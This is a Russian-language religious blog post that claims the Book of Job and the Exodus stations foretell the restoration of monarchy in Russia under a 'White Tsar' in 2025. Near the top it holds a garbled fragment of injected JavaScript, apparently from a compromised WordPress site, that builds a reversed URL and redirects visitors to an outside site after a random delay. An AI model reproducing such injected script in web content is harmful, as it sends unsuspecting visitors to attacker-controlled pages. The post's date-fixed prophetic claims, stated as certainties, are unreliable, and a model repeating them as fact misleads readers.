Монархия Россия/Русь

Пророчество Иова о 2025-м годе и Белом цареНа чтение 13 мин


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Сегодня расскажу одну из главных загадок Иова — о которой не подозревают ни богословы, ни священнослужители. Читателям Духовного миллионщика о Открытой Семинарии, особенно постоянным, легче будет понять, оценить свидетельство Иова — и возрадоваться ему. Потому что свидетельство его верно, и свидетельство от книги Иова дает четвертую ниточку, безошибочно ведущую нас через ежегодные реалии последних уже тридцати четырех лет, начиная с 1988-го года — к 2025-му году как году восстановления монархии в России, году посещения Господом Своего народа. Но сразу предупрежу — статья не слишком короткая, и короче ее сделать никак не получилось.

Мне многим, очень многим нужно поделиться с вами, друзья, чтобы нам с наименьшими потерями, и даже плодотворно прожить эти три с половиной года и войти в реалию царства подготовленными, активными и видными деятелями Новой Эпохи. Слово Божие просто ошеломляет своей практичностью, своей очевидной пророческой картиной — для тех, конечно, кто читает, молится, думает и ищет. Вот, сегодня открою перед вами еще одну панорамную картину, которую стоит изучать годами, не переставая изумляться. но я не буду вам все разжевывать, а дам лишь основные — но ошеломляющие — факты. Хотя, на самом деле, еще более ошеломляющие пророческие факты вы сможете для себя найти, когда увидите, поймете эту большую картинку, которую я хочу представить для вас сегодня, уважаемые друзья.

Простите за такое длинное предисловие, но просто откровения, которые вы получаете, так велики, что я должен сам с уважением относиться к нему, и говорить с вами, как с людьми подготовленными. А подготовлены принять, и понять, и оценить великое откровение пророка Иова (да-да, Иов был не только мученик, но и пророк!) те из моих читателей, кто хорошо знаком с давнишним циклом Русский Исход, который безвестен для большинства новых читателей ДМ и ОС.

И поэтому я не хочу нечаянно оттолкнуть новых читателей удивительными откровениями библейского пророка Иова — только потому, что они, скажем так, находятся на первом курсе Открытой Семинарии, в то время как другие читатели уже на третьем и четвертом годе, или курсе обучения в ОС. В этом всегда сложность любого педагога — смешанная аудитория. Но в этом и здоровый вызов нам, педагогам. Да и разумным студентам.

Поэтому я задумал, поделившись с вами величайшей тайной Иова, не выкладывать все остальные его тайны (хотя мы продолжим изучение этой книги), но позволить себе такую роскошь наслаждаться ими самому. Я иногда позволяю себе такую роскошь — не сфотографировать прекрасный закат на прекрасном мосту, не рассказать о том прекрасном, о чем рассказать невозможно, что передать так же сложно, как передать на фото предзакатний восторг, запах дыма, мысли о жертве вечерней…

В общем, я решил повторить тут свой старый цикл о Русском Исходе — как повторяют прекрасную песню. Ведь никакую прекрасную песню не поют лишь однажды, но она всегда будет на чьих-то устах. Так и Слово Божие, преломленное для наших дней — не останется без читателя. Повторю, между другими публикациями, мою Песнь — о Великом Русском Исходе, в потоке которого мы все с вами оказались, друзья. Но это я начну, пожалуй, завтра, а сегодня, как и обещал (еще раз простите за супер уже длинное предисловие) — великая тайна Иова.

Те, кто читал предыдущие мои публикации об Иове уже понял, что Иов — это не просто несчастный мученик из далекого прошлого, но есть прообраз последнего свидетеля, последнего мученика — Белого царя. Мы видели, что Иов представляет собой — хотя и нищего и обесславленного — государя. У него, как мы видели, отнимается корона, от него отворачиваются слуги, на него ополчаются враги… Но Бог прославляет Иова и устраивает ему настоящее Царство — которое является прототипом, мпророческим предзнаменованием царствования Белого царя.

И, кстати, не сомневайтесь в царственности Иова — вспомните, что в те дни были города-государства, и что патриарх Авраам, защищая своего племянника Лота, сражался вместе со своими слугами против аж пяти царей — и победил их. Иов — царь в изгнании, никто, униженные и раздавленный еретик, который неожиданно восставляется Богом и поставляется на Новое Царство. Эти все параллели не случайны — Иов, как первый помазанник, всей своей жизнью подробно указывает на жизнь Белого царя, и более того, что самое для нас важное — на жизнь всей России.

Да-да, книга Иова — это пророчество о России. Мы уже говорили о том, как сюжет Иова фактически предвосхищает собой Русские сюжет — мы видели государя Николая и потерю им Руси как нового Иова. Но книга Иова — не только о потерях, но и о великих обретениях. Те, кто честен, те признают в России образ страдальца Иова. Те, кто горды — не признают. Но те, кто честны и кротки не только признают в Руси страдальца Иова, но узнают и победителя Иова — Иова царя, Белого царя.

Но это — самая общая картина, которая изобилует деталями, описывать которые я не буду. потому что это заняло бы целую книгу. Но я теперь для вас эту общую картину объясню так, что вы уже никогда не забудете и найдете для себя неисчерпаемый пророческий источник.

Итак, история Иова начинается с того же, с чего начинается история Исхода — с Пасхи. Книга начинается с жертвоприношений Иова, а далее мы узнаем, что сам Иов, по предназначению Божию, оказывается Агнцем, отданным на заклание — или почти заклание. Первая станция Исхода начинается с откровения Ангца, с Пасхи, с великого спасения (в будущем), купленном великим страданием и великою Жертвою уже теперь, в этот день, в этом пункте, на этой станции веры…

Те, кто читал про Русский Исход, и те, кто знаком с Библейской историей должны помнить, что Исход насчитывает 42 станции и длился 42 года — ото дня Пасхи, до того дня, как народ получил Обетованную Землю. Так вот, книга Иова содержит в себе 42 главы — потому что она отражает собой то время, когда Иов пребывал буквально в пустыне, во вретище, в нужде, в болезни, в отвержении. Иисус Христос, наш Спаситель и Мессия Израилев, уже Своим родословием отразил значимость этого числа, этих «станций веры»: «Итак, всех родов от Авраама до Давида четырнадцать родов; и от Давида до переселения в Вавилон четырнадцать родов; и от переселения в Вавилон до Христа четырнадцать родов.» (Ев. От Матфея 1:17).

Разбивка книги Иова на главы не искусственна — она представляет собой единственно возможный вариант. Потому что фактически каждая глава — это чья-то новая речь, или новая тема.

Вы, наверное, удивлялись (как и я) тому, что в книге Иова так много глав, содержащих как будто повтор, как будто одно и то же — бесконечные речи друзей (или врагов?) Иова, о которых в конце концов Господь сказал, что они были не так мудры, как слова Иова. Так зачем же тогда все эти не слишком мудрые, но такие долгие и подробные речи — прямо в сердце, в середине Библии? На все есть причины. Помните — это происходит все в пустыне, представляет долгие странствия и ропот, ропот народа. И ответ Бога.

Каждая глава книги Иова — это одна из станций Великого Исхода. Опять-таки, я не буду тут разжевывать все для вас — из уважения к вам, и из-за отсутствия такой лавины времени — все то, что ошарашивает меня, что заставляет мое сердце биться сильнее, отчего мне хочется кричать — эврика и эврика! Но открою еще хотя бы одну, крайне важную загадку Иова. Забегая далеко вперед в нашем изучении книги Иова я хочу перенестись вместе с вами, дорогие читатели, из тех длинных и грустных глав, представляющих годы грустного, почти безнадежного скитания Иова в пустыне. Посмотрим на тот поворотный момент, которым отмечено его восстановление.

А поворотными в истории Иова являются главы 38 и 39 — где, наконец, Господь чудесным образом Сам вмешивается и меняет судьбу Иова и его народа. Тут опять надо быть настоящим посвященным читателем ОС, чтобы понять красоту и глубину данных нам пророческих откровений. Например, надо помнить, что во всех больших библейских пророчествах указание Господом на государя совпадает с откровением о Краеугольном камне — Великой подводной стене. Вспомните хотя бы такие материалы, как Ангел с землемерной вервью: явление Стены народу. Процитирую немного оттуда, но очень рекоменду прочитать или перечитать эту статью:

«И снова я поднял глаза мои и увидел: вот муж, у которого в руке землемерная вервь.» Зах 2:1

Где еще в Библии мы читаем о землемерной верви? Где она упоминается в первый раз, в самый первый? В книге Иова — самой древней книге Библии. После долгих передряг и несчастий, в которые попал великомученник Иов (как и Русь в наши дни, как и Иерусалим во времена Захарии), Иову является Бог и начинает Бог со следующих слов, в которых и говорит о той землемерной верви, которую Он заложил, и которую он теперь являет Иову:

1 Господь отвечал Иову из бури и сказал: 2 кто сей, омрачающий Провидение словами без смысла? 3 Препояшь ныне чресла твои, как муж: Я буду спрашивать тебя, и ты объясняй Мне: 4 где был ты, когда Я полагал основания земли? Скажи, если знаешь. 5 Кто положил меру ей, если знаешь? или кто протягивал по ней вервь? 6 На чем утверждены основания ее, или кто положил краеугольный камень ее, 7 при общем ликовании утренних звезд, когда все сыны Божии восклицали от радости? Иов 38:1-7

Вот и «муж» (мы увидим, что это — Ангел Божий) в пророчестве Захарии появляется после плача Захарии о печальном состоянии его народа, о разрушенном царстве (как некогда Иов плакал перед Богом). И вновь Господь посылает видение о «землемерной верви» — и это видение должно было утешить (и утешило) Захарию. Оно означало, что его город, его царство — будет снова восстановлены. Более того — они охватят всю Землю.

«Я спросил: куда ты идешь? и он сказал мне: измерять Иерусалим, чтобы видеть, какая широта его и какая длина его. И вот Ангел, говоривший со мною, выходит, а другой Ангел идет навстречу ему, и сказал он этому: иди скорее, скажи этому юноше: Иерусалим заселит окрестности по причине множества людей и скота в нем. И Я буду для него, говорит Господь, огненною стеною вокруг него и прославлюсь посреди него.» Захария 2:2-5

Так вот, когда мы берем это пророчество, эту модель восстановления Царства, на которую указывает Бог через Захарию — мы должны, обязаны применять это пророчество к нам, к нашим дням — потому что в наши дни и произойдет, и происходит уже полное и великое исполнение этой пророческой модели, в которой «землемерная вервь», в руках Ангела, явленная некоему «юноше» имеет свой изначальный и конечный смысл: это та землемерная вервь, та измерительная веревка, линейка, которая «измеряет» (проходит) через всю Землю, от полюса до полюса.

Да-да, это явление людям той верви, которую Бог еще называет фундаментом и основанием Земли, ее краеугольным камнем.

Как от нас спрятали краеугольный камень Земли. Часть 1. Основание Земли.

Статья получается длинная, а я еще самого важного и не сказал. А самое важное то, что явление Бога Иову, которое начинается с откровением о Великой подводной Стене и заканчивается восстановлением Иова и помазанием его как Белого царя, а также восстановлением его страны. А станции Исхода 38 и 39, как и 38 и 39 станции, или главы книги Иова — указывают на 2024-25 годы! Кто-то это уже понял, кому-то сейчас подскажу.

Тот цикл, про Русский Исход, как соотносящийся с пророческим библейским Исходом, я разработал в целом еще в 1990-х, и тогда надо мной очень смеялись — ведь все только начиналось. Читатели, возможно, помнят, что у меня было много пробелов в понимании — которые я вполне откровенно признавал. Все честные люди — даже пророк Иов — признают свою ограниченность. И тогда открывает Господь большее. Напомню, что я писал в цикле Русский Исход о 2024-25 годах, в статье Падение истукана: 2021 — 2026, Россия в пророчестве:

Станция 38 (2024) Холмы Аварима

И отправились из Овофа и расположились станом в Ийм-Авариме, на пределах Моава.

Ийм-Аварим — «Кучи Аварима», или «Холмы Аварима». В данном тексте трудно даже определить значение слова Аварим. Скорее всего оно происходит от арамейского слова «авар» — «проходить, проходить мимо». Не буду гадать об этой станции. Возможно, тут пастух Давид и вынужден, как я писал уже, уйти в бега. Или же просто уйти на задний план, пока не пройдет этот год.

Станция 39 (2025) Великое понимание

И отправились из Ийма и расположились станом в Дивон-Гаде.
Название станции означает «великое понимание» или «великое потомство сыновей». Возможно, это начало исполнения пророчества, данного о Белом царе (как Илие) в последних словах Ветхого Завета:

«Вот, Я пошлю к вам Илию пророка пред наступлением дня Господня, великого и страшного. И он обратит сердца отцов к детям и сердца детей к отцам их, чтобы Я, придя, не поразил земли проклятием

О том же времени, и о тех же делах Белого царя и тех, сердца которых он обратит к Богу и к отцам (что происходит в самые последние времена) написано и в последней главе книги пророка Даниила:

«И разумные будут сиять, как светила на тверди, и обратившие многих к правде — как звезды, вовеки, навсегда

Думаю, Великое Понимание — это Великое Возрождение, начавшееся с России. Великое Духовное возрождение!

Да, я примерно так себе это представляю. Раньше так ходили за Лениным. А идти можно только за Богом. И славить — только Его!

Станция 40 (2026) Сокрытая смоква

И отправились из Дивон-Гада и расположились станом в Алмон-Дивлафаиме.

«Сокрытая смоква». Эта станция для меня, признаюсь, полнейшая загадка. Так, в общем, и предполагает, и определяет ее название — сокрытая смоква. Скажу лишь, что смоква является символом Иерусалима.

В дальнейших публикациях мы с вами говорили, что «сокрытая смоква» означает Москва (смоква) — это время восстановления и нового расцвета Москвы — с Белым царем. Но давайте посмотрим на 38 и 39 станции, которые и производят поворот, и которые (особенно 38-ю) я раньше не слишком понимал.

Но Иов — этот верный свидетель — дает нам подсказку и понимание, он как бы дублирует картинку Исхода, и там, где мы читаем только название места — у Иова мы читаем раскрытие смысла этой станции, этого события, этого года. Итак, еще раз вернемся к 38-ой станции Исхода:

И отправились из Овофа и расположились станом в Ийм-Авариме, на пределах Моава. Ийм-Аварим — «Кучи Аварима», или «Холмы Аварима».

А теперь смотрим на то самое первое и ключевое откровение, которое дает Бог Иову, восстанавливая его из грязи в князи — откровение Великой подводной Стены, или горы, именуемой еще Алатырем! Горы Аварима, к которым привел Бог народ Свой, чтобы благословить их на следующей станции великим благословением, великим пониманием — это и есть, я думаю, горы Алатыря, откровение об Алатыре, которое знаменует собой во всех пророчествах появление помазанного государя.

Великая Подводная Стена и Шоу Трумана

Что и происходит одновременно с этим. 39-ая глава книги Иова, соответствующая 39-ой станции Исхода, которая переводится как «Великое понимание». Действительно, в конце 39-ой главы, выслушав Бога, Иов восклицает — «Однажды я говорил — теперь отвечать не буду, даже дважды, но более не буду» (Иов 39:35). Достигается «Великое понимание», исполняется пророчество, Бог указывает — в том числе и друзьям, и врагам Иова — на него, как на Своего помазанника, Белого царя. Это, друзья — события 2025-го года, события 39-ой станции!

Выводы

Я знаю, новые читатели наверняка запутались немножко, и будут склонны поспешно критиковать. С другой стороны опытные читатели не только все поняли, но и, я уверен, ухватили еще множество удивительных пророческих ниточек, о которых у меня не было времени тут говорить. Сознавая это я возвращаюсь к тому, о чем говорил в начале этой статьи — к нужде перепубликовать некоторые из старых публикаций ДМ и ОС для новых читателей.

Сделаем так, чтобы не было скучно и старым читателям — на этот раз я буду не просто перепечатывать старые материалы, но добавлять кое-что из того, что открылось за эти годы. Я не буду ничего в принципе менять — да это и легко проверить — но лишь постараюсь восполнить те пробелы, в которых признавался в старом цикле, составленном еще в прошлом столетии. Каждая прекрасная песня должна звучать снова и снова, и звучать лучше — для нового поколения. А пророчества — это больше, чем песни. И не менее прекрасны.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.6/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.